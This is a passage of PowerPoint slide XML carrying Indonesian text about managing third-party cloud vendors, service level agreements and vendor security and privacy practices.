              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merujuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, platform, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cermat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>negosiasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengadopsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform cloud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kualitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perjanjian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SLA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perjanjian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguraikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyampaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diharapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. SLA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penalti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. SLA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertanggungjawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
